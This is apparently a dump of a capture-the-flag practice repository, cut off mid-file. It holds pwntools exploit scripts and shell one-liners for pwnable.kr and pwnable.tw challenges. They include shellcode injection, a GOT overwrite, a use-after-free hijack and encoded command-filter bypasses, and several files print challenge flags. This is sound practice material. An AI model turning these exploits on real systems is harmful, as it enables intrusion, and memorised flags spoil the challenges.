-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/LockITProManual.pdf -------------------------------------------------------------------------------- /Practice/MicroCorruption/MSP430Reference.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/MSP430Reference.pdf -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Grotesque/cmd3: -------------------------------------------------------------------------------- 1 | passwd : FuN_w1th_5h3ll_v4riabl3s_haha 2 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/alloca/alloca: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/alloca/alloca -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/alloca/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Addr 4 | win_func = 0x80485ab 5 | 6 | ###Exploit 7 | s = ssh(host='pwnable.kr',port=2222, 8 | user='alloca', 9 | password='guest') 10 | r = s.process('./alloca',env={p32(win_func)*1000:p32(win_func)*1000}) 11 | 12 | r.sendlineafter('you\n\n','-82') 13 | r.sendline(str(0xff80000)) 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/ascii_easy/ascii_easy: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/ascii_easy/ascii_easy -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/brain_fuck/bf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/brain_fuck/bf -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/dragon/dragon: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/dragon/dragon -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/echo1/echo1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/echo1/echo1 -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/echo1/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch='amd64' 4 | 5 | ###Util 6 | def echo1(data): 7 | r.sendlineafter('> ','1') 8 | r.sendline(data) 9 | 10 | ###Addr 11 | buf = 0x6020a0 12 | 13 | ###Exploit 14 | r = remote('pwnable.kr',9010) 15 | 16 | relay = asm('''jmp rsp''') 17 | r.sendlineafter(' : ',relay) 18 | 19 | padding = b'a'*0x28 20 | fake_rip = p64(buf) 21 | shellcode = asm(shellcraft.sh()) 22 | payload = padding+fake_rip+shellcode 23 | echo1(payload) 24 | 25 | r.interactive() 26 | 27 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/echo2/echo2: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/echo2/echo2 -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/fix/fix: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/fix/fix -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/fsb/fsb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/fsb/fsb -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/loveletter/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Exploit 4 | s = ssh(host='pwnable.kr',port=2222, 5 | user='loveletter', 6 | password='guest') 7 | r = s.remote('127.0.0.1',9034) 8 | 9 | r.send((b'val cat flag '.ljust(0xfd,b'a')+b';\x01').ljust(0xff,b'\x00')) 10 | r.interactive() 11 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/loveletter/loveletter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/loveletter/loveletter -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/md5_calculator/genrand.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(){ 6 | srand(time(NULL)); 7 | for(int i = 
0;i<8;i++) 8 | printf("%d\n",rand()); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/md5_calculator/md5_calculator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/md5_calculator/md5_calculator -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/note/note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/note/note -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/otp/exp: -------------------------------------------------------------------------------- 1 | ###if write to file fails, the file will be empty 2 | ###ulimit can set limit to maximum write size to file 3 | ###WARNING : directly executing ./otp 0 will trigger SIGXFSZ 4 | ### but running it as subprocess will bypass this problem 5 | 6 | ulimit -f 0 && python -c "import os; os.system('./otp 0')" 7 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/rsa_calculator/rsa_calculator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/rsa_calculator/rsa_calculator -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/simple_login/exp.py: -------------------------------------------------------------------------------- 1 | ###stack migration 2 | 3 | from pwn import * 4 | 5 | ###Addr 6 | buf = 0x811eb40 7 | target = 0x8049284 8 | 9 | ###Exploit 10 | r = 
remote('pwnable.kr',9003) 11 | payload = p32(target)+b'a'*4+p32(buf-4) 12 | payload = b64e(payload) 13 | r.sendlineafter('Authenticate : ',payload) 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/simple_login/simple_login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/simple_login/simple_login -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/tiny_easy/tiny_easy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/tiny_easy/tiny_easy -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Secret/Exploitable/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Addr 4 | # libc2.23 5 | stdout_struct_offset = 0x1b2d60 6 | one_gadget = 0x3ac5c 7 | 8 | ###Exploit 9 | s = ssh(host='pwnable.kr', port=2222, 10 | user='exploitable', 11 | password='guest') 12 | r = s.process(['nc','127.0.0.1','9018']) 13 | 14 | stdout_struct_addr = u32(r.recv(4)) 15 | libc_base = stdout_struct_addr-stdout_struct_offset 16 | r.sendline(str(-(0xffffffff+1-(libc_base+one_gadget)))) 17 | r.interactive() 18 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Secret/Exploitable/exploitable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Secret/Exploitable/exploitable -------------------------------------------------------------------------------- 
/Practice/Pwnable.kr/Secret/Malware/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | r = remote('pwnable.kr',9017) 5 | 6 | ''' 7 | mov al, 0xC3 8 | mov rdi, [Rsp+0x78] 9 | stosb 10 | call [rsp+0x78] 11 | jmp 2 12 | add [rax], al 13 | ''' 14 | r.sendlineafter('A: ','.octa 0x2eb782454ffaa78247c8b48c3b0') 15 | ''' 16 | nop 17 | nop 18 | ... 19 | nop 20 | ''' 21 | r.sendlineafter('B: ','.rept 0x1000; .long 0x90909090; .endr') 22 | r.interactive() 23 | 24 | #R3l4tiVe_t1Ming_4ttAck_w1Th_Tr4nsLatiOn_caCh3_iS_FuN 25 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Secret/Unexploitable/unexploitable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Secret/Unexploitable/unexploitable -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/blackjack/exp: -------------------------------------------------------------------------------- 1 | no checking for negative bet 2 | just bet a large negative ammount of money and lose 3 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/blukat: -------------------------------------------------------------------------------- 1 | ###group permission set for password, just cat to read it 2 | ###by the way, the password is "cat: password: Permission denied", bruh 3 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/bof/bof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/bof/bof -------------------------------------------------------------------------------- 
/Practice/Pwnable.kr/Toddler/bof/exp.py: -------------------------------------------------------------------------------- 1 | ###Simple bof to overwrite value 2 | 3 | from pwn import * 4 | 5 | r = remote('pwnable.kr',9000) 6 | payload = b'a'*0x34+p32(0xcafebabe) 7 | r.sendline(payload) 8 | r.interactive() 9 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/cmd1/cmd1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int filter(char* cmd){ 5 | int r=0; 6 | r += strstr(cmd, "flag")!=0; 7 | r += strstr(cmd, "sh")!=0; 8 | r += strstr(cmd, "tmp")!=0; 9 | return r; 10 | } 11 | int main(int argc, char* argv[], char** envp){ 12 | putenv("PATH=/thankyouverymuch"); 13 | if(filter(argv[1])) return 0; 14 | system( argv[1] ); 15 | return 0; 16 | } 17 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/cmd1/exp: -------------------------------------------------------------------------------- 1 | ###Absolute path and wildcards are useful 2 | 3 | ./cmd1 "/bin/cat f???" 4 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/cmd2/exp: -------------------------------------------------------------------------------- 1 | passwd : mommy now I get what PATH environment is for :) 2 | 3 | ###Sol1 4 | cd / ### $pwd = / 5 | ./home/cmd2/cmd2 '$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)f???' 6 | 7 | ###Sol2 8 | ###Encode command(/bin/cat flag) as octal and print it 9 | ./cmd2 '$(printf "\57\142\151\156\57\143\141\164\40\146\154\141\147")' 10 | 11 | ###Sol3 12 | ###command -p supplies a default path 13 | ./cmd2 'command -p cat f???' 14 | 15 | ###Sol4 16 | ###string indexing for desired characters(?) 
17 | ###should be doable, but haven't tried 18 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/collision/exp: -------------------------------------------------------------------------------- 1 | ###learn how to pass binary data as a command-line argument 2 | 3 | ./col $(printf "\xec\x21\xdd\x21@:@@@:@@@:@@@9??") 4 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/fd/exp: -------------------------------------------------------------------------------- 1 | ###fd0 = stdin 2 | 3 | ./fd 4660 4 | LETMEWIN 5 | 6 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/flag/exp: -------------------------------------------------------------------------------- 1 | upx -d to unpack flag 2 | open with IDA to see flag 3 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/flag/flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/flag/flag -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/horcruxes/horcruxes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/horcruxes/horcruxes -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/lotto/exp: -------------------------------------------------------------------------------- 1 | ###misconfiguration causes a "match" to happen when any single char matches 2 | ###input the same char six times, and the success rate will be high enough 3 |
-------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/memcpy/exp: -------------------------------------------------------------------------------- 1 | ###the movntps instruction in fast_copy requires memory to be aligned to 16 bytes 2 | ###malloc chunk sizes on 32 bit will be padded to the nearest number N where (N>(requested+4) && N%8==0) 3 | ###setting every requested size to an odd multiple of 8 will automatically meet the requirement 4 | > 8 5 | > 24 6 | > 40 7 | > 72 8 | > 136 9 | > 264 10 | > 520 11 | > 1032 12 | > 2056 13 | > 4104 14 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/mistake/exp: -------------------------------------------------------------------------------- 1 | ### the comparison operator has higher precedence than the assignment operator 2 | ### so fd becomes 0 by mistake -> the program reads from stdin 3 | 4 | 1111111111 5 | 0000000000 6 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/passcode/exp: -------------------------------------------------------------------------------- 1 | ###Hijack .got of exit 2 | 3 | python -c "print('a'*96+chr(0x18)+chr(0xa0)+chr(0x04)+chr(0x08)+str(0x80485e3))" | ./passcode 4 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/passcode/passcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/passcode/passcode -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/random/exp: -------------------------------------------------------------------------------- 1 | ###rand() is never seeded, so it uses the default seed and returns the same value on every run 2 | 3 | -1255736440 4 | --------------------------------------------------------------------------------
/Practice/Pwnable.kr/Toddler/random/random.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(){ 4 | unsigned int random; 5 | random = rand(); // random value! 6 | 7 | unsigned int key=0; 8 | scanf("%d", &key); 9 | 10 | if( (key ^ random) == 0xdeadbeef ){ 11 | printf("Good!\n"); 12 | system("/bin/cat flag"); 13 | return 0; 14 | } 15 | 16 | printf("Wrong, maybe you should try 2^32 cases.\n"); 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/shellshock/shellshock.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main(){ 3 | setresuid(getegid(), getegid(), getegid()); 4 | setresgid(getegid(), getegid(), getegid()); 5 | system("/home/shellshock/bash -c 'echo shock_me'"); 6 | return 0; 7 | } 8 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/uaf/exp: -------------------------------------------------------------------------------- 1 | ###Use after Free 2 | ###Try to let function fake virtual ptr point to give_shell() 3 | ###pie is off, so we can easily find give_shell() at 0x401568 4 | ###Man object size = 24 5 | ./uaf 24 /tmp/fake 6 | > 3 7 | > 2 8 | > 1 9 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/uaf/uaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/uaf/uaf -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/unlink/unlink: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/unlink/unlink 
-------------------------------------------------------------------------------- /Practice/Pwnable.tw/3x17/3x17: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/3x17/3x17 -------------------------------------------------------------------------------- /Practice/Pwnable.tw/alive_note/alive_note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/alive_note/alive_note -------------------------------------------------------------------------------- /Practice/Pwnable.tw/applestore/applestore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/applestore/applestore -------------------------------------------------------------------------------- /Practice/Pwnable.tw/babyallocator/babyallocator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/babyallocator/babyallocator -------------------------------------------------------------------------------- /Practice/Pwnable.tw/babystack/babystack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/babystack/babystack -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bash/bash/exp.py: -------------------------------------------------------------------------------- 1 | ###Abuse loader to run ELF without x permission 2 | 3 | from pwn import * 4 | 5 | r = remote('chall.pwnable.tw',10108) 6 | 7 | 
r.sendlineafter('bash-4.3$ ','/lib64/ld-linux-x86-64.so.2 /bin/bash') 8 | r.sendline('cat < /dev/tcp/127.0.0.1/1337') 9 | r.interactive() 10 | -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bash/prob/bash_revenge.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bash/prob/bash_revenge.tgz -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bookwriter/bookwriter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bookwriter/bookwriter -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bounty_program_alpha/bounty_program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bounty_program_alpha/bounty_program -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bounty_program_alpha/wrapper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bounty_program_alpha/wrapper -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bounty_program_beta/bounty_program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bounty_program_beta/bounty_program -------------------------------------------------------------------------------- 
/Practice/Pwnable.tw/bounty_program_beta/wrapper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bounty_program_beta/wrapper -------------------------------------------------------------------------------- /Practice/Pwnable.tw/breakout/breakout: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/breakout/breakout -------------------------------------------------------------------------------- /Practice/Pwnable.tw/calc/calc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/calc/calc -------------------------------------------------------------------------------- /Practice/Pwnable.tw/caov/caov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/caov/caov -------------------------------------------------------------------------------- /Practice/Pwnable.tw/critical_heap/prob/critical_heap/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | MAINTAINER angelboy 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN apt-get install libc6-dev-i386 -y 6 | RUN useradd -m critical_heap++ 7 | RUN chmod 774 /tmp 8 | RUN chmod -R 774 /var/tmp 9 | RUN chmod -R 774 /dev 10 | RUN chmod -R 774 /run 11 | RUN chmod 1733 /tmp /var/tmp /dev/shm 12 | RUN chown -R root:root /home/critical_heap++ 13 | CMD ["/usr/sbin/xinetd","-dontfork"] 14 | -------------------------------------------------------------------------------- 
/Practice/Pwnable.tw/critical_heap/prob/critical_heap/share/critical_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/critical_heap/prob/critical_heap/share/critical_heap -------------------------------------------------------------------------------- /Practice/Pwnable.tw/critical_heap/prob/critical_heap/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/critical_heap++/critical_heap 5 | -------------------------------------------------------------------------------- /Practice/Pwnable.tw/critical_heap/prob/critical_heap/xinetd: -------------------------------------------------------------------------------- 1 | service critical_heap 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/critical_heap++/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = critical_heap++ 10 | port = 4869 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /Practice/Pwnable.tw/deaslr/deaslr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/deaslr/deaslr -------------------------------------------------------------------------------- /Practice/Pwnable.tw/death_note/death_note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/death_note/death_note -------------------------------------------------------------------------------- /Practice/Pwnable.tw/digimon/digimon: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/digimon/digimon -------------------------------------------------------------------------------- /Practice/Pwnable.tw/dubblesort/dubblesort: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/dubblesort/dubblesort -------------------------------------------------------------------------------- /Practice/Pwnable.tw/food_store/food_store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/food_store/food_store -------------------------------------------------------------------------------- /Practice/Pwnable.tw/ghostparty/ghostparty: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/ghostparty/ghostparty -------------------------------------------------------------------------------- /Practice/Pwnable.tw/hacknote/hacknote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/hacknote/hacknote -------------------------------------------------------------------------------- /Practice/Pwnable.tw/heap_paradise/heap_paradise: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/heap_paradise/heap_paradise -------------------------------------------------------------------------------- 
/Practice/Pwnable.tw/kidding/kidding: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/kidding/kidding -------------------------------------------------------------------------------- /Practice/Pwnable.tw/mno2/mno2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/mno2/mno2 -------------------------------------------------------------------------------- /Practice/Pwnable.tw/omegago/omegago: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/omegago/omegago -------------------------------------------------------------------------------- /Practice/Pwnable.tw/orw/orw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/orw/orw -------------------------------------------------------------------------------- /Practice/Pwnable.tw/printable/printable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/printable/printable -------------------------------------------------------------------------------- /Practice/Pwnable.tw/re-alloc/re-alloc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/re-alloc/re-alloc -------------------------------------------------------------------------------- /Practice/Pwnable.tw/re-alloc_revenge/re-alloc_revenge: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/re-alloc_revenge/re-alloc_revenge -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seccomp_tools/allow_orw.bpf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/seccomp_tools/allow_orw.bpf -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seccomp_tools/forbid_execve.bpf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/seccomp_tools/forbid_execve.bpf -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seccomp_tools/kill_all.bpf: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seccomp_tools/seccomp-tools: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/seccomp_tools/seccomp-tools -------------------------------------------------------------------------------- /Practice/Pwnable.tw/secret_of_my_heart/secret_of_my_heart: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/secret_of_my_heart/secret_of_my_heart -------------------------------------------------------------------------------- /Practice/Pwnable.tw/secretgarden/secretgarden: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/secretgarden/secretgarden -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seethefile/seethefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/seethefile/seethefile -------------------------------------------------------------------------------- /Practice/Pwnable.tw/silver_bullet/silver_bullet: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/silver_bullet/silver_bullet -------------------------------------------------------------------------------- /Practice/Pwnable.tw/spirited_away/spirited_away: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/spirited_away/spirited_away -------------------------------------------------------------------------------- /Practice/Pwnable.tw/starbound/starbound: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/starbound/starbound -------------------------------------------------------------------------------- /Practice/Pwnable.tw/start/start: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/start/start -------------------------------------------------------------------------------- 
/Practice/Pwnable.tw/stupid_boss/stupid: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/stupid_boss/stupid -------------------------------------------------------------------------------- /Practice/Pwnable.tw/tcache_tear/tcache_tear: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/tcache_tear/tcache_tear -------------------------------------------------------------------------------- /Practice/Pwnable.tw/unexploitable/unexploitable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/unexploitable/unexploitable -------------------------------------------------------------------------------- /Practice/Pwnable.tw/wannaheap/wannaheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/wannaheap/wannaheap -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Add/add: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Add/add -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Add/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | 5 | ###Addr 6 | win = 0x400822 7 | 8 | ###Exploit 9 | r = 